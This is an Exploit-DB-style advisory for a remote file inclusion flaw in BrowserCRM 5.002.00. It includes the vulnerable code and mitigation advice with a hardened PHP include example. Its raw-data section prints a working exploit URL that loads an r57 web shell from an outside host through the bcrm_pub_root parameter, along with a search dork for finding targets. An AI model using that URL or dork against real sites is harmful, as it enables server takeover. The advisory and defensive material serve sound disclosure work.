Vendor: BrowserCRM
By: ahmadbady
CVSS: 9.3 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: BrowserCRM
Affected Version From: 5.002.00
Affected Version To: 5.002.00
Patch Exists: NO
Related CWE: N/A
CPE: a:browsercrm:browsercrm:5.002.00
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2008

browsercrm-5.002.00 remote file including

The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'bcrm_pub_root' parameter of the 'clients.php' script. A remote attacker can include arbitrary files from remote resources and execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized.
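As an added example (not BrowserCRM's own code), the include pattern quoted in this advisory is shown beside a hardened form in which no request value can influence the include path; the directory layout, the function names and the way the variable is populated are assumptions:

```php
<?php
// Added example, not part of BrowserCRM. $bcrm_pub_root is taken from the request
// here to make the defect visible; in the real script it is a globally scoped variable.

// Vulnerable pattern, as described in the advisory: the include path is built from a
// value the client controls, so a remote URL or any local path can be included.
function vulnerable_include(array $request): void
{
    $bcrm_pub_root = $request['bcrm_pub_root'] ?? '';
    require_once($bcrm_pub_root . "/public_prepend.inc.php");
}

// Hardened form: the application root is a fixed constant, the include name must be
// one of a known set, and the resolved path is checked to stay inside the root.
define('BCRM_PUB_ROOT', __DIR__ . '/..');   // assumed layout: pub/ sits below the app root

function safe_include(string $file): void
{
    $allowed = ['public_prepend.inc.php'];   // the only include this entry point needs
    if (!in_array($file, $allowed, true)) {
        throw new RuntimeException('Unexpected include name');
    }
    $root = realpath(BCRM_PUB_ROOT);
    $path = realpath($root . '/' . $file);
    // realpath() returns false for missing files; the prefix check defeats ../ traversal
    // and, because the path is assembled from a constant, any http:// or ftp:// scheme.
    if ($root === false || $path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException('Include path outside application root');
    }
    require_once $path;
}

safe_include('public_prepend.inc.php');
```

Independently of the code fix, setting allow_url_include=Off in php.ini stops PHP from including files from remote URLs at all, which removes the remote half of this issue as defence in depth.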

Exploit-DB raw data:

script: browsercrm-5.002.00 remote file including

Download From: http://www.browsercrm.com/download/browsercrm-5.002.00.tar.gz

dork: Copyright © 2007 BrowserCRM Ltd

Vuln Code:

require_once($bcrm_pub_root . "/public_prepend.inc.php");


exploit:

www.site.com/browser_crm/pub/clients.php?bcrm_pub_root=http://www.gwebspace.de/mohsen/shell/r57.txt?


Author: ahmadbady | kivi_hacker666@yahoo.com

# milw0rm.com [2008-06-08]